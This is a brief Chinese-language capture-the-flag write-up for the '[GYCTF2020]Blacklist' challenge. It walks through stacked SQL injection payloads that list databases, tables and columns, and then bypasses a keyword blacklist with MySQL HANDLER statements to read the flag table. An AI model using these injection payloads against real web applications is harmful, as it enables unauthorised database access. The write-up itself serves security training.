[GYCTF2020]Blacklist
堆叠注入
输入了127.0.0.1 发现了恰如其名,黑名单过滤掉了一堆东西
根据之前做题的经验
想到了show 没被过滤
想到了堆叠注入
然而,请注意最后的;很重要。。!!!
大佬博客
1‘;show databases;
测试成功
1’;show tables;
1’;show columns from FlagHere;
接下来,如何去读取flag这个列中内容呢?
接下来的才是重点,在MYSQL数据库中:
可以用handler 【表名】 open来打开某个表
然后就可以在里面用handler 【表名】 read 【获取第几行】来获取该数据库里面的数据了
最后再利用handler【表名】 close来关闭
构造payload:
1’;
handler FlagHere open;
handler FlagHere read first;
handler FlagHere close;
最后得到了flag
不close也行的哈。。
1’;
handler FlagHere open;
handler FlagHere read first;
handler FlagHere read next;
handler FlagHere read next;